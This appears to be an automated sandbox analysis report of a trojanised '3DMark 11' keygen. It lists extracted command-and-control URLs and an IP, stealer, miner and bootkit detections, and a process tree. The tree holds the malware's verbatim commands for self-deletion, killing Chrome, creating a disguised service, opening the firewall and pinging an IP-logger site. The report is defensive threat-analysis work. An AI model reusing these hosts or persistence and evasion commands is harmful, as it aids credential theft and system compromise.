Overview

overview

10

Static

static

8

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

8

ฺฺฺ�...ฺฺ

windows10_x64

3

ฺฺฺ�...ฺฺ

windows10_x64

4

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

9

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

8

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

3

ฺฺฺ�...ฺฺ

windows10_x64

1

ฺฺฺ�...ฺฺ

windows10_x64

3

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

8

ฺฺฺ�...ฺฺ

windows10_x64

10

ฺฺฺ�...ฺฺ

windows10_x64

1

ฺฺฺ�...ฺฺ

windows10_x64

1

Analysis

  • max time kernel
    239s
  • max time network
    310s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18-11-2020 15:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3DMark 11 Advanced Edition.exe

Score
10/10
azorultplugxredlinesmokeloadertofseevidarxmrignew_year_btcbackdoorbootkitdiscoveryevasioninfostealermacrominerpersistencespywarestealertrojanupxvmprotectxlm

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

smokeloader

Version

2020

C2

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

NEW_YEAR_BTC

C2

86.105.252.12:35200

Extracted

Family

smokeloader

Version

2019

C2

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/
rc4.i32
rc4.i32

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

    trojanplugx
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Nirsoft 8 IoCs
  • XMRig Miner Payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 40 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • VMProtect packed file 2 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 18 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 38 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 3 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 26 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe
    "C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4764
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:416
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe
        intro.exe 1O5ZF
        3⤵
        • Executes dropped EXE
        PID:388
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1136
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4640
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            5⤵
              PID:2340
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
          keygen-step-1.exe
          3⤵
          • Executes dropped EXE
          PID:1260
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
          keygen-step-2.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1588
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2352
            • C:\Windows\SysWOW64\PING.EXE
              ping 127.0.0.1
              5⤵
              • Runs ping.exe
              PID:1044
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
          keygen-step-3.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2896
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4516
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              5⤵
              • Runs ping.exe
              PID:2336
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
          keygen-step-4.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4572
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetWindowsHookEx
            PID:4732
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2364
            • C:\Users\Admin\AppData\Local\Temp\sib323E.tmp\0\setup.exe
              "C:\Users\Admin\AppData\Local\Temp\sib323E.tmp\0\setup.exe" -s
              5⤵
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3960
              • C:\Program Files (x86)\9ku5npt6tedk\aliens.exe
                "C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"
                6⤵
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • Writes to the Master Boot Record (MBR)
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Modifies system certificate store
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:3932
                • C:\Windows\SysWOW64\msiexec.exe
                  msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
                  7⤵
                  • Enumerates connected drives
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  PID:2144
                • C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe
                  C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe 0011 installp1
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks whether UAC is enabled
                  • Writes to the Master Boot Record (MBR)
                  • Suspicious use of SetThreadContext
                  • Checks SCSI registry key(s)
                  • Suspicious use of SetWindowsHookEx
                  PID:4404
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    8⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:4584
                  • C:\Users\Admin\AppData\Roaming\1605715548739.exe
                    "C:\Users\Admin\AppData\Roaming\1605715548739.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605715548739.txt"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:4740
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    8⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:4528
                  • C:\Users\Admin\AppData\Roaming\1605715553192.exe
                    "C:\Users\Admin\AppData\Roaming\1605715553192.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605715553192.txt"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:4556
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    8⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:2528
                  • C:\Users\Admin\AppData\Roaming\1605715558348.exe
                    "C:\Users\Admin\AppData\Roaming\1605715558348.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605715558348.txt"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:4756
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    8⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:1392
                  • C:\Users\Admin\AppData\Roaming\1605715561348.exe
                    "C:\Users\Admin\AppData\Roaming\1605715561348.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605715561348.txt"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:4468
                  • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
                    C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:4480
                  • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
                    "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Writes to the Master Boot Record (MBR)
                    • Suspicious use of SetWindowsHookEx
                    PID:4352
                  • C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe
                    C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe /silent
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:5000
                    • C:\Users\Admin\AppData\Local\Temp\is-P7MJL.tmp\1021C014A4C9A552.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-P7MJL.tmp\1021C014A4C9A552.tmp" /SL5="$40196,761193,121344,C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe" /silent
                      9⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SetWindowsHookEx
                      PID:4820
                      • C:\Program Files (x86)\RearRips\seed.sfx.exe
                        "C:\Program Files (x86)\RearRips\seed.sfx.exe" -pK2j8l614 -s1
                        10⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        PID:5084
                        • C:\Program Files (x86)\Seed Trade\Seed\seed.exe
                          "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
                          11⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: MapViewOfSection
                          PID:2384
                      • C:\Windows\SysWOW64\cmd.exe
                        "cmd.exe" /c "start https://iplogger.org/14Ahe7"
                        10⤵
                        • Checks computer location settings
                        PID:3264
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe"
                    8⤵
                      PID:2424
                      • C:\Windows\SysWOW64\PING.EXE
                        ping 127.0.0.1 -n 3
                        9⤵
                        • Runs ping.exe
                        PID:4196
                  • C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe
                    C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe 200 installp1
                    7⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Writes to the Master Boot Record (MBR)
                    • Checks SCSI registry key(s)
                    • Suspicious use of SetWindowsHookEx
                    PID:3472
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im chrome.exe
                      8⤵
                        PID:4560
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im chrome.exe
                          9⤵
                          • Kills process with taskkill
                          PID:908
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe"
                        8⤵
                          PID:3660
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 127.0.0.1 -n 3
                            9⤵
                            • Runs ping.exe
                            PID:1748
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"
                        7⤵
                          PID:2260
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 127.0.0.1 -n 3
                            8⤵
                            • Runs ping.exe
                            PID:2948
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"
                    4⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4260
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:4828
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im chrome.exe
                      5⤵
                        PID:4840
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im chrome.exe
                          6⤵
                          • Kills process with taskkill
                          PID:4360
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"
                      4⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      PID:2568
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        5⤵
                        • Executes dropped EXE
                        PID:2004
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        5⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4488
              • C:\Windows\system32\msiexec.exe
                C:\Windows\system32\msiexec.exe /V
                1⤵
                • Enumerates connected drives
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4192
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding 0D74AA5402A3F7B17726D1B9DDC1ABEA C
                  2⤵
                  • Loads dropped DLL
                  PID:4128
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                1⤵
                • Drops file in Windows directory
                • Modifies Internet Explorer settings
                • Modifies registry class
                • Suspicious use of SetWindowsHookEx
                PID:1840
              • C:\Windows\system32\browser_broker.exe
                C:\Windows\system32\browser_broker.exe -Embedding
                1⤵
                • Modifies Internet Explorer settings
                PID:4608
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2328
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies Internet Explorer settings
                • Modifies registry class
                PID:3084
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies registry class
                PID:1192
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies registry class
                PID:696
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies registry class
                PID:972
              • C:\Users\Admin\AppData\Local\Temp\A976.exe
                C:\Users\Admin\AppData\Local\Temp\A976.exe
                1⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Modifies system certificate store
                PID:4460
                • C:\Windows\SysWOW64\icacls.exe
                  icacls "C:\Users\Admin\AppData\Local\9507e886-305f-43d4-af92-699e2b8d747b" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                  2⤵
                  • Modifies file permissions
                  PID:5056
                • C:\Users\Admin\AppData\Local\Temp\A976.exe
                  "C:\Users\Admin\AppData\Local\Temp\A976.exe" --Admin IsNotAutoStart IsNotTask
                  2⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  PID:4724
                  • C:\Users\Admin\AppData\Local\77b51f05-0d01-4cd4-a0d2-55a03b287e53\updatewin1.exe
                    "C:\Users\Admin\AppData\Local\77b51f05-0d01-4cd4-a0d2-55a03b287e53\updatewin1.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:4240
                  • C:\Users\Admin\AppData\Local\77b51f05-0d01-4cd4-a0d2-55a03b287e53\updatewin2.exe
                    "C:\Users\Admin\AppData\Local\77b51f05-0d01-4cd4-a0d2-55a03b287e53\updatewin2.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:2376
                  • C:\Users\Admin\AppData\Local\77b51f05-0d01-4cd4-a0d2-55a03b287e53\5.exe
                    "C:\Users\Admin\AppData\Local\77b51f05-0d01-4cd4-a0d2-55a03b287e53\5.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:4876
              • C:\Users\Admin\AppData\Local\Temp\AB5B.exe
                C:\Users\Admin\AppData\Local\Temp\AB5B.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:3908
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im AB5B.exe /f & erase C:\Users\Admin\AppData\Local\Temp\AB5B.exe & exit
                  2⤵
                    PID:1352
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im AB5B.exe /f
                      3⤵
                      • Kills process with taskkill
                      PID:4428
                • C:\Users\Admin\AppData\Local\Temp\AEA8.exe
                  C:\Users\Admin\AppData\Local\Temp\AEA8.exe
                  1⤵
                  • Executes dropped EXE
                  PID:4548
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\itkctxng\
                    2⤵
                      PID:3388
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rtounak.exe" C:\Windows\SysWOW64\itkctxng\
                      2⤵
                        PID:2172
                      • C:\Windows\SysWOW64\sc.exe
                        "C:\Windows\System32\sc.exe" create itkctxng binPath= "C:\Windows\SysWOW64\itkctxng\rtounak.exe /d\"C:\Users\Admin\AppData\Local\Temp\AEA8.exe\"" type= own start= auto DisplayName= "wifi support"
                        2⤵
                          PID:1756
                        • C:\Windows\SysWOW64\sc.exe
                          "C:\Windows\System32\sc.exe" description itkctxng "wifi internet conection"
                          2⤵
                            PID:1732
                          • C:\Windows\SysWOW64\sc.exe
                            "C:\Windows\System32\sc.exe" start itkctxng
                            2⤵
                              PID:4372
                            • C:\Windows\SysWOW64\netsh.exe
                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                              2⤵
                                PID:3904
                            • C:\Users\Admin\AppData\Local\Temp\B224.exe
                              C:\Users\Admin\AppData\Local\Temp\B224.exe
                              1⤵
                              • Executes dropped EXE
                              PID:3452
                              • C:\Windows\SysWOW64\cmd.exe
                                /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\Temp\B224.exe
                                2⤵
                                  PID:3380
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 3
                                    3⤵
                                    • Delays execution with timeout.exe
                                    PID:4536
                              • C:\Users\Admin\AppData\Local\Temp\BD40.exe
                                C:\Users\Admin\AppData\Local\Temp\BD40.exe
                                1⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                PID:2480
                              • C:\Users\Admin\AppData\Local\Temp\CACE.exe
                                C:\Users\Admin\AppData\Local\Temp\CACE.exe
                                1⤵
                                • Executes dropped EXE
                                PID:2180
                              • C:\Users\Admin\AppData\Local\Temp\D3A9.exe
                                C:\Users\Admin\AppData\Local\Temp\D3A9.exe
                                1⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:2252
                              • C:\Windows\SysWOW64\itkctxng\rtounak.exe
                                C:\Windows\SysWOW64\itkctxng\rtounak.exe /d"C:\Users\Admin\AppData\Local\Temp\AEA8.exe"
                                1⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:4880
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  2⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  PID:284

                              Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • memory/284-249-0x0000000000550000-0x0000000000565000-memory.dmp

                                Filesize

                                84KB

                                Download

                              • memory/284-415-0x0000000000AC0000-0x0000000000AC5000-memory.dmp

                                Filesize

                                20KB

                                Download

                              • memory/284-412-0x0000000004760000-0x000000000496F000-memory.dmp

                                Filesize

                                2.1MB

                                Download

                              • memory/284-414-0x0000000000960000-0x0000000000970000-memory.dmp

                                Filesize

                                64KB

                                Download

                              • memory/284-413-0x0000000000950000-0x0000000000956000-memory.dmp

                                Filesize

                                24KB

                                Download

                              • memory/284-417-0x0000000000AD0000-0x0000000000AD7000-memory.dmp

                                Filesize

                                28KB

                                Download

                              • memory/284-416-0x0000000008C90000-0x000000000909B000-memory.dmp

                                Filesize

                                4.0MB

                                Download

                              • memory/1268-465-0x0000000003328000-0x0000000003329000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/1268-467-0x0000000004ED0000-0x0000000004ED1000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/1392-132-0x00007FF9568E0000-0x00007FF95695E000-memory.dmp

                                Filesize

                                504KB

                                Download

                              • memory/1916-462-0x000000006FA80000-0x000000007016E000-memory.dmp

                                Filesize

                                6.9MB

                                Download

                              • memory/2180-242-0x0000000008120000-0x0000000008121000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/2180-281-0x000000000ADE0000-0x000000000ADE1000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/2180-239-0x0000000007520000-0x0000000007521000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/2180-238-0x0000000004E70000-0x0000000004E93000-memory.dmp

                                Filesize

                                140KB

                                Download

                              • memory/2180-237-0x000000006FA80000-0x000000007016E000-memory.dmp

                                Filesize

                                6.9MB

                                Download

                              • memory/2180-236-0x0000000005040000-0x0000000005041000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/2180-267-0x0000000009CD0000-0x0000000009CD1000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/2180-265-0x0000000009960000-0x0000000009961000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/2180-264-0x00000000098D0000-0x00000000098D1000-memory.dmp

                                Filesize

                                4KB

                                Download

                              • memory/2180-263-0x0000000009810000-0x0000000009811000-memory.dmp

                                Filesize

                                4KB

                                Download

